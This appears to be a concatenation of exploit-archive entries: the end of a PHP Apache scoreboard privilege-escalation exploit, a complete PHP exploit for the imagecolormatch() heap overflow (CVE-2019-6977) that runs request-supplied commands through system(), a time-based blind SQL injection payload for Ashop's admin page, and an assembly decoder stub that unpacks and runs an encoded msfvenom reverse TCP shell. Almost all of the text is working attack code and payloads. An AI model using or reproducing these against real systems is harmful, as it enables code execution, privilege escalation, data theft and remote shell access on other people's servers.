      $this->abc[$p+$i] = $payload[$i];
    }

    # Fill the spray area with a pointer to properties

    $properties_address = $payload_start + strlen($bucket) + strlen($meth);
    o('Spraying pointer');
    o('  Address: 0x' . dechex($properties_address));
    o('  From: 0x' . dechex($spray_min));
    o('  To: 0x' . dechex($spray_max));
    o('  Size: 0x' . dechex($spray_size));
    o('  Covered: 0x' . dechex($spray_size * count($workers_pids)));
    o('  Apache: 0x' . dechex(
      $addresses['apache'][1] -
      $addresses['apache'][0]
    ));

    $s_properties_address = ptr2str($properties_address);

    for(
      $i = $spray_min;
      $i < $spray_max;
      $i++
    )
    {
      $this->abc[$i - $address] = $s_properties_address[$i % 8];
    }
    o('');

    # Find workers PID in the SHM: it indicates the beginning of their
    # process_score structure. We can then change process_score.bucket to
    # the index we computed. When apache reboots, it will use
    # all_buckets[ap_scoreboard_image->parent[i]->bucket]->mutex
    # which means we control the whole apr_proc_mutex_t structure.
    # This structure contains pointers to multiple functions, especially
    # mutex->meth->child_init(), which will be called before privileges
    # are dropped.
    # We do this for every worker PID, incrementing the bucket index so that
    # we cover a bigger range.

    o('Iterating in SHM to find PIDs...');

    # Number of bucket indexes covered by our spray
    $spray_nb_buckets = (int) ($spray_size / $size_prefork_child_bucket);
    # Number of bucket indexes covered by our spray and the PS structures
    $total_nb_buckets = $spray_nb_buckets * count($workers_pids);
    # First bucket index to handle
    $bucket_index = $bucket_index_middle - (int) ($total_nb_buckets / 2);

    # Iterate over every process_score structure until we find every PID or
    # we reach the end of the SHM
    for(
      $p = $addresses['shm'][0] + 0x20;
      $p < $addresses['shm'][1] && count($workers_pids) > 0;
      $p += 0x24
    )
    {
      $l = $p - $address;
      $current_pid = str2ptr($this->abc, $l, 4);
      o('Got PID: ' . $current_pid);
      # The PID matches one of the workers
      if(in_array($current_pid, $workers_pids))
      {
        unset($workers_pids[$current_pid]);
        o('  PID matches');
        # Update bucket address
        $s_bucket_index = pack('l', $bucket_index);
        $this->abc[$l + 0x20] = $s_bucket_index[0];
        $this->abc[$l + 0x21] = $s_bucket_index[1];
        $this->abc[$l + 0x22] = $s_bucket_index[2];
        $this->abc[$l + 0x23] = $s_bucket_index[3];
        o('  Changed bucket value to ' . $bucket_index);
        $min = $spray_min - $size_prefork_child_bucket * $bucket_index;
        $max = $spray_max - $size_prefork_child_bucket * $bucket_index;
        o('  Ranges: 0x' . dechex($min) . ' - 0x' . dechex($max));
        # This bucket range is covered, go to the next one
        $bucket_index += $spray_nb_buckets;
      }
    }

    if(count($workers_pids) > 0)
    {
      o(
'Unable to find PIDs ' .
        implode(', ', $workers_pids) .
' in SHM, exiting.'
      );
      exit();
    }

    o('');
    o('EXPLOIT SUCCESSFUL.');
    o('Await 6:25AM.');

    return 0;
  }
}

function o($msg)
{
  # No concatenation -> no string allocation
  print($msg);
  print("\n");
}

function ptr2str($ptr, $m=8)
{
  $out = "";
    for ($i=0; $i<$m; $i++)
    {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

function str2ptr(&$str, $p, $s=8)
{
  $address = 0;
  for($j=$s-1;$j>=0;$j--)
  {
    $address <<= 8;
    $address |= ord($str[$p+$j]);
  }
  return $address;
}

function in($i, $range)
{
  return $i >= $range[0] && $i < $range[1];
}

/**
 * Finds the offset of a symbol in a file.
 */
function find_symbol($file, $symbol)
{
    $elf = file_get_contents($file);
    $e_shoff = str2ptr($elf, 0x28);
    $e_shentsize = str2ptr($elf, 0x3a, 2);
    $e_shnum = str2ptr($elf, 0x3c, 2);

    $dynsym_off = 0;
    $dynsym_sz = 0;
    $dynstr_off = 0;

    for($i=0;$i<$e_shnum;$i++)
    {
        $offset = $e_shoff + $i * $e_shentsize;
        $sh_type = str2ptr($elf, $offset + 0x04, 4);

        $SHT_DYNSYM = 11;
        $SHT_SYMTAB = 2;
        $SHT_STRTAB = 3;

        switch($sh_type)
        {
            case $SHT_DYNSYM:
                $dynsym_off = str2ptr($elf, $offset + 0x18, 8);
                $dynsym_sz = str2ptr($elf, $offset + 0x20, 8);
                break;
            case $SHT_STRTAB:
            case $SHT_SYMTAB:
                if(!$dynstr_off)
                    $dynstr_off = str2ptr($elf, $offset + 0x18, 8);
                break;
        }

    }

    if(!($dynsym_off && $dynsym_sz && $dynstr_off))
        exit('.');

    $sizeof_Elf64_Sym = 0x18;

    for($i=0;$i * $sizeof_Elf64_Sym < $dynsym_sz;$i++)
    {
        $offset = $dynsym_off + $i * $sizeof_Elf64_Sym;
        $st_name = str2ptr($elf, $offset, 4);

        if(!$st_name)
            continue;

        $offset_string = $dynstr_off + $st_name;
        $end = strpos($elf, "\x00", $offset_string) - $offset_string;
        $string = substr($elf, $offset_string, $end);

        if($string == $symbol)
        {
            $st_value = str2ptr($elf, $offset + 0x8, 8);
            return $st_value;
        }
    }

    die('Unable to find symbol ' . $symbol);
}

# Obtains the addresses of the shared memory block and some functions through 
# /proc/self/maps
# This is hacky as hell.
function get_all_addresses()
{
  $addresses = [];
  $data = file_get_contents('/proc/self/maps');
  $follows_shm = false;

  foreach(explode("\n", $data) as $line)
  {
    if(!isset($addresses['shm']) && strpos($line, '/dev/zero'))
    {
            $line = explode('', $line)[0];
            $bounds = array_map('hexdec', explode('-', $line));
            if ($bounds[1] - $bounds[0] == 0x14000)
            {
                $addresses['shm'] = $bounds;
                $follows_shm = true;
            }
        }
    if(
      preg_match('#(/[^\s]+libc-[0-9.]+.so[^\s]*)#', $line, $matches) &&
      strpos($line, 'r-xp')
    )
    {
      $offset = find_symbol($matches[1], 'system');
      $line = explode('', $line)[0];
      $line = hexdec(explode('-', $line)[0]);
      $addresses['system'] = $line + $offset;
    }
    if(
      strpos($line, 'libapr-1.so') &&
      strpos($line, 'r-xp')
    )
    {
      $line = explode('', $line)[0];
      $bounds = array_map('hexdec', explode('-', $line));
      $addresses['libaprX'] = $bounds;
    }
    if(
      strpos($line, 'libapr-1.so') &&
      strpos($line, 'r--p')
    )
    {
      $line = explode('', $line)[0];
      $bounds = array_map('hexdec', explode('-', $line));
      $addresses['libaprR'] = $bounds;
    }
    # Apache's memory block is between the SHM and ld.so
    # Sometimes some rwx region gets mapped; all_buckets cannot be in there
    # but we include it anyways for the sake of simplicity
    if(
      (
        strpos($line, 'rw-p') ||
        strpos($line, 'rwxp')
      ) &&
            $follows_shm
    )
    {
            if(strpos($line, '/lib'))
            {
                $follows_shm = false;
                continue;
            }
      $line = explode('', $line)[0];
      $bounds = array_map('hexdec', explode('-', $line));
      if(!array_key_exists('apache', $addresses))
          $addresses['apache'] = $bounds;
      else if($addresses['apache'][1] == $bounds[0])
                $addresses['apache'][1] = $bounds[1];
      else
                $follows_shm = false;
    }
    if(
      preg_match('#(/[^\s]+libphp7[0-9.]+.so[^\s]*)#', $line, $matches) &&
      strpos($line, 'r-xp')
    )
    {
      $offset = find_symbol($matches[1], 'zend_object_std_dtor');
      $line = explode('', $line)[0];
      $line = hexdec(explode('-', $line)[0]);
      $addresses['zend_object_std_dtor'] = $line + $offset;
    }
  }

  $expected = [
'shm', 'system', 'libaprR', 'libaprX', 'apache', 'zend_object_std_dtor'
  ];
  $missing = array_diff($expected, array_keys($addresses));

  if($missing)
  {
    o(
'The following addresses were not determined by parsing ' .
'/proc/self/maps: ' . implode(', ', $missing)
    );
    exit(0);
  }


  o('PID: ' . getmypid());
  o('Fetching addresses');

  foreach($addresses as $k => $a)
  {
    if(!is_array($a))
      $a = [$a];
    o('' . $k . ': ' . implode('-0x', array_map(function($z) {
        return '0x' . dechex($z);
    }, $a)));
  }
  o('');

  return $addresses;
}

# Extracts PIDs of apache workers using /proc/*/cmdline and /proc/*/status,
# matching the cmdline and the UID
function get_workers_pids()
{
  o('Obtaining apache workers PIDs');
  $pids = [];
  $cmd = file_get_contents('/proc/self/cmdline');
  $processes = glob('/proc/*');
  foreach($processes as $process)
  {
    if(!preg_match('#^/proc/([0-9]+)$#', $process, $match))
      continue;
    $pid = (int) $match[1];
    if(
      !is_readable($process . '/cmdline') ||
      !is_readable($process . '/status')
    )
      continue;
    if($cmd !== file_get_contents($process . '/cmdline'))
      continue;

    $status = file_get_contents($process . '/status');
    foreach(explode("\n", $status) as $line)
    {
      if(
        strpos($line, 'Uid:') === 0 &&
        preg_match('#\b' . posix_getuid() . '\b#', $line)
      )
      {
        o('  Found apache worker: ' . $pid);
        $pids[$pid] = $pid;
        break;
      }

    }
  }

  o('Got ' . sizeof($pids) . ' PIDs.');
  o('');

  return $pids;
}

$addresses = get_all_addresses();
$workers_pids = get_workers_pids();
real();

<?php
# imagecolormatch() OOB Heap Write exploit
# https://bugs.php.net/bug.php?id=77270
# CVE-2019-6977
# Charles Fol
# @cfreal_
#
# Usage: GET/POST /exploit.php?f=<system_addr>&c=<command>
# Example: GET/POST /exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
#
# Target: PHP 7.2.x
# Tested on: PHP 7.2.12
#

/*

buf = (unsigned long *)safe_emalloc(sizeof(unsigned long), 5 * im2->colorsTotal, 0);

  for (x=0; x<im1->sx; x++) {
    for( y=0; y<im1->sy; y++ ) {
      color = im2->pixels[y][x];
      rgb = im1->tpixels[y][x];
      bp = buf + (color * 5);
      (*(bp++))++;
      *(bp++) += gdTrueColorGetRed(rgb);
      *(bp++) += gdTrueColorGetGreen(rgb);
      *(bp++) += gdTrueColorGetBlue(rgb);
      *(bp++) += gdTrueColorGetAlpha(rgb);
    }

The buffer is written to by means of a color being the index:
color = im2->pixels[y][x];
..
bp = buf + (color * 5);

*/

#
# The bug allows us to increment 5 longs located after buf in memory.
# The first long is incremented by one, others by an arbitrary value between 0
# and 0xff.
#

error_reporting(E_ALL);
define('OFFSET_STR_VAL', 0x18);
define('BYTES_PER_COLOR', 0x28);


class Nenuphar extends DOMNode
{
  # Add a property so that std.properties is created
  function __construct()
  {
    $this->x = '1';
  }

  # Define __get
  # => ce->ce_flags & ZEND_ACC_USE_GUARDS == ZEND_ACC_USE_GUARDS
  # => zend_object_properties_size() == 0
  # => sizeof(intern) == 0x50
  function __get($x)
  {
    return $this->$x;
  }
}

class Nenuphar2 extends DOMNode
{
  function __construct()
  {
    $this->x = '2';
  }

  function __get($x)
  {
    return $this->$x;
  }
}

function ptr2str($ptr, $m=8)
{
  $out = "";
    for ($i=0; $i<$m; $i++)
    {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

function str2ptr(&$str, $p, $s=8)
{
  $address = 0;
  for($j=$p+$s-1;$j>=$p;$j--)
  {
    $address <<= 8;
    $address |= ord($str[$j]);
  }
  return $address;
}

# Spray stuff so that we get concurrent memory blocks
for($i=0;$i<100;$i++)
  ${'spray'.$i} = str_repeat(chr($i), 2 * BYTES_PER_COLOR - OFFSET_STR_VAL);
for($i=0;$i<100;$i++)
  ${'sprayx'.$i} = str_repeat(chr($i), 12 * BYTES_PER_COLOR - OFFSET_STR_VAL);

#
# #1: Address leak
# We want to obtain the address of a string so that we can make
# the Nenuphar.std.properties HashTable* point to it and hence control its
# structure.
#

# We create two images $img1 and $img2, both of 1 pixel.
# The RGB bytes of the pixel of $img1 will be added to OOB memory because we set
# $img2 to have $nb_colors images and we set its only pixel to color number
# $nb_colors.
#
$nb_colors = 12;
$size_buf = $nb_colors * BYTES_PER_COLOR;

# One pixel image so that the double loop iterates only once
$img1 = imagecreatetruecolor(1, 1);

# The three RGB values will be added to OOB memory
# First value (Red) is added to the size of the zend_string structure which
# lays under buf in memory.
$color = imagecolorallocate($img1, 0xFF, 0, 0);
imagefill($img1, 0, 0, $color);

$img2 = imagecreate(1, 1);

# Allocate $nb_colors colors: |buf| = $nb_colors * BYTES_PER_COLOR = 0x1e0
# which puts buf in 0x200 memory blocks
for($i=0;$i<$nb_colors;$i++)
  imagecolorallocate($img2, 0, 0, $i);

imagesetpixel($img2, 0, 0, $nb_colors + 1);

# Create a memory layout as such:
# [z:   zend_string: 0x200]
# [x:   zend_string: 0x200]
# [y:   zend_string: 0x200]
$z = str_repeat('Z', $size_buf - OFFSET_STR_VAL);
$x = str_repeat('X', $size_buf - OFFSET_STR_VAL);
$y = str_repeat('Y', $size_buf - OFFSET_STR_VAL);

# Then, we unset z and call imagecolormatch(); buf will be at z's memory
# location during the execution
# [buf: long[]     : 0x200]
# [x:   zend_string: 0x200]
# [y:   zend_string: 0x200]
#
# We can write buf + 0x208 + (0x08 or 0x10 or 0x18)
# buf + 0x208 + 0x08 is X's zend_string.len
unset($z);
imagecolormatch($img1, $img2);

# Now, $x's size has been increased by 0xFF, so we can read further in memory.
#
# Since buf was the last freed block, by unsetting y, we make its first 8 bytes
# point to the old memory location of buf
# [free:             0x200] <-+
# [x:   zend_string: 0x200]   |
# [free:             0x200] --+
unset($y);
# We can read those bytes because x's size has been increased
$z_address = str2ptr($x, 488) + OFFSET_STR_VAL;

# Reset both these variables so that their slot cannot be "stolen" by other
# allocations
$y = str_repeat('Y', $size_buf - OFFSET_STR_VAL - 8);

# Now that we have z's address, we can make something point to it.
# We create a fake HashTable structure in Z; when the script exits, each element
# of this HashTable will be destroyed by calling ht->pDestructor(element)
# The only element here is a string: "id"
$z = 
  # refcount
  ptr2str(1) .
  # u-nTableMask meth
  ptr2str(0) .
  # Bucket arData
  ptr2str($z_address + 0x38) .
  # uint32_t nNumUsed;
  ptr2str(1, 4) .
    # uint32_t nNumOfElements;
  ptr2str(1, 4) .
  # uint32_t nTableSize
  ptr2str(0, 4) .
  # uint32_t nInternalPointer
  ptr2str(0, 4) .
  # zend_long nNextFreeElement
  ptr2str(0x4242424242424242) .
  # dtor_func_t pDestructor
  ptr2str(hexdec($_REQUEST['f'])) .
  str_pad($_REQUEST['c'], 0x100, "\x00") .
  ptr2str(0, strlen($y) - 0x38 - 0x100);
;

# At this point we control a string $z and we know its address: we'll make an
# internal PHP HashTable structure point to it.


#
# #2: Read Nenuphar.std.properties
#

# The tricky part here was to find an interesting PHP structure that is
# allocated in the same fastbins as buf, so that we can modify one of its
# internal pointers. Since buf has to be a multiple of 0x28, I used dom_object,
# whose size is 0x50 = 0x28 * 2. Nenuphar is a subclass of dom_object with just
# one extra method, __get().
# php_dom.c:1074: dom_object *intern = ecalloc(1, sizeof(dom_object) + zend_object_properties_size(class_type));
# Since we defined a __get() method, zend_object_properties_size(class_type) = 0
# and not -0x10.
#
# zend_object.properties points to an HashTable. Controlling an HashTable in PHP
# means code execution since at the end of the script, every element of an HT is
# destroyed by calling ht.pDestructor(ht.arData[i]).
# Hence, we want to change the $nenuphar.std.properties pointer.
#
# To proceed, we first read $nenuphar.std.properties, and then increment it
# by triggering the bug several times, until
# $nenuphar.std.properties == $z_address
#
# Sadly, $nenuphar.std.ce will also get incremented by one every time we trigger
# the bug. This is due to (*(bp++))++ (in gdImageColorMatch).
# To circumvent this problem, we create two classes, Nenuphar and Nenuphar2, and
# instanciate them as $nenuphar and $nenuphar2. After we're done changing the
# std.properties pointer, we trigger the bug more times, until
# $nenuphar.std.ce == $nenuphar2.std.ce2
#
# This way, $nenuphar will have an arbitrary std.properties pointer, and its
# std.ce will be valid.
#
# Afterwards, we let the script exit, which will destroy our fake hashtable (Z),
# and therefore call our arbitrary function.
#

# Here we want fastbins of size 0x50 to match dom_object's size
$nb_colors = 2;
$size_buf = $nb_colors * BYTES_PER_COLOR;

$img1 = imagecreatetruecolor(1, 1);
# The three RGB values will be added to OOB memory
# Second value (Green) is added to the size of the zend_string structure which
# lays under buf in memory.
$color = imagecolorallocate($img1, 0, 0xFF, 0);
imagefill($img1, 0, 0, $color);

# Allocate 2 colors so that |buf| = 2 * 0x28 = 0x50
$img2 = imagecreate(1, 1);
for($i=0;$i<$nb_colors;$i++)
  imagecolorallocate($img2, 0, 0, $i);

$y = str_repeat('Y', $size_buf - OFFSET_STR_VAL - 8);
$x = str_repeat('X', $size_buf - OFFSET_STR_VAL - 8);
$nenuphar = new Nenuphar();
$nenuphar2 = new Nenuphar2();

imagesetpixel($img2, 0, 0, $nb_colors);

# Unsetting the first string so that buf takes its place
unset($y);

# Trigger the bug: $x's size is increased by 0xFF
imagecolormatch($img1, $img2);

$ce1_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x28);
$ce2_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + $size_buf + 0x28);
$props_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x38);

print('Nenuphar.ce: 0x' . dechex($ce1_address) . "\n");
print('Nenuphar2.ce: 0x' . dechex($ce2_address) . "\n");
print('Nenuphar.properties: 0x' . dechex($props_address) . "\n");
print('z.val: 0x' . dechex($z_address) . "\n");
print('Difference: 0x' . dechex($z_address-$props_address) . "\n");

if(
  $ce2_address - $ce1_address < ($z_address-$props_address) / 0xff ||
  $z_address - $props_address < 0
)
{
  print('That won\'t work');
  exit(0);
}


#
# #3: Modifying Nenuphar.std.properties and Nenuphar.std.ce
#

# Each time we increment Nenuphar.properties by an arbitrary value, ce1_address
# is also incremented by one because of (*(bp++))++;
# Therefore after we're done incrementing props_address to z_address we need
# to increment ce1's address one by one until Nenuphar1.ce == Nenuphar2.ce

# The memory structure we have ATM is OK. We can just trigger the bug again
# until Nenuphar.properties == z_address

$color = imagecolorallocate($img1, 0, 0xFF, 0);
imagefill($img1, 0, 0, $color);
imagesetpixel($img2, 0, 0, $nb_colors + 3);

for($current=$props_address+0xFF;$current<=$z_address;$current+=0xFF)
{
  imagecolormatch($img1, $img2);
  $ce1_address++;
}

$color = imagecolorallocate($img1, 0, $z_address-$current+0xff, 0);
imagefill($img1, 0, 0, $color);
$current = imagecolormatch($img1, $img2);
$ce1_address++;

# Since we don't want to touch other values, only increase the first one, we set
# the three colors to 0
$color = imagecolorallocate($img1, 0, 0, 0);
imagefill($img1, 0, 0, $color);

# Trigger the bug once to increment ce1 by one.
while($ce1_address++ < $ce2_address)
{
  imagecolormatch($img1, $img2);
}

# Read the string again to see if we were successful

$new_ce1_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x28);
$new_props_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x38);

if($new_ce1_address == $ce2_address && $new_props_address == $z_address)
{
  print("\nExploit SUCCESSFUL !\n");
}
else
{
  print('NEW Nenuphar.ce: 0x' . dechex($new_ce1_address) . "\n");
  print('NEW Nenuphar.std.properties: 0x' . dechex($new_props_address) . "\n");
  print("\nExploit FAILED !\n");
}

# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 08.04.2019
# Exploit Author: Doğukan Karaciğer
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Lastest
# Tested on: Ubuntu-trusty-64
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/bannedcustomers.php
Parameter: blacklistitemid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blacklistitem=1&deletebutton=Delete&blacklistitemid=1 AND (SELECT
* FROM (SELECT(SLEEP(5)))MGvE)

; Date: 08/04/2019
; XANAX Decoder
; Author: Alan Vivona
; Description: Reverts the xor-add-not-add-xor sequence using the same 4 byte key and executes the encoded payload. 
; Tested on: x86-x64 GNU/Linux

global _start

section .text

keys.xor1 equ 0x29
keys.add1 equ 0xff
keys.xor2 equ 0x50
keys.add2 equ 0x05

; xanax encoded payload
payload.len equ 74 ; this can't be over 127 bytes otherwise it will procude nullbytes

_start:

    jmp encode_setup
    ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex
    ; Encoded using XANAX Encoder:
    payload_start: db  0x92, 0x55, 0xc4, 0x05, 0x92, 0x8a, 0xdf, 0x92, 0x8d, 0xde, 0x8f, 0x89, 0xf4, 0x17, 0xf4, 0x25, 0x8a, 0x8c, 0x9d, 0xc0, 0xff, 0x8c, 0x8c, 0x8d, 0xdd, 0xf4, 0x35, 0x66, 0x92, 0x9c, 0xc2, 0x92, 0x52, 0xc4, 0x8f, 0x89, 0x92, 0x8b, 0xde, 0xf4, 0x7f, 0x4e, 0x92, 0xad, 0xc4, 0x8f, 0x89, 0xf9, 0x76, 0x92, 0xa3, 0xc4, 0x05, 0xf4, 0x23, 0xaf, 0xea, 0x95, 0xee, 0xaf, 0xfb, 0x94, 0x8c, 0xdb, 0xf4, 0x35, 0x67, 0xda, 0xd7, 0xf4, 0x35, 0x66, 0x8f, 0x89

    encode_setup:
    xor rcx, rcx
    lea rsi, [rel payload_start]
    encode:    
        mov al, byte [rsi+rcx]
        ; XANAX encoding (xor add neg add xor)
        xor al, keys.xor2
        sub al, keys.add2
        not al
        sub al, keys.add1
        xor al, keys.xor1

        mov byte [rsi+rcx], al

        inc rcx
        cmp rcx, payload.len
        jne encode

    ; Execute payload
    jmp rsi